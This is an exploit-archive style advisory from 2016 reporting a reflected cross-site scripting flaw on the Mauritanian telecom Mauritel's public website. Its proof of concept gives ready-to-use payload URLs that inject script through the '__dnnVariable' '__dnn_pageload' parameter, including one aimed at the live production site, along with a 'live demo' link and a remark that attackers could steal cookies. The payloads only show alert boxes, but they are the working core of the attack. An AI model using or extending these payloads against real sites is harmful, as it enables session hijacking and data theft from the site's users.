###################### # Exploit Title : Mauritel Mobile XSS Vulnerability # Exploit Author : xBADGIRL21 # Vendor Homepage : http://www.mauritel.mr # Tested on: [ WIN 10] # MyBlog : http://xbadgirl21.blogspot.com/ # skype:xbadgirl21 # Date: 29/09/2016 # video Proof : https://youtu.be/BOcJN42U9uM ###################### # [★] DESCRIPTION : ###################### # [+] Telecommunication Mauritel Mobile Website # [+] Is Suffering From Cross-Site Scripting Vulnerability # [+] AND that May Allow Attackers to get Cookies and Data ...etc ###################### # [★] Poc : ###################### # http://127.0.0.1/?__dnnVariable={'__dnn_pageload':'alert(/XSS/)'} # ... # http://www.mauritel.mr/?__dnnVariable={'__dnn_pageload':'alert(/Tested by xBADGIRL21/)'} ###################### # [★] Live Demo : ###################### # http://www.mauritel.mr ###################### # Discovered by : xBADGIRL21 # Greetz : All Mauritanien Hackers - NoWhere ######################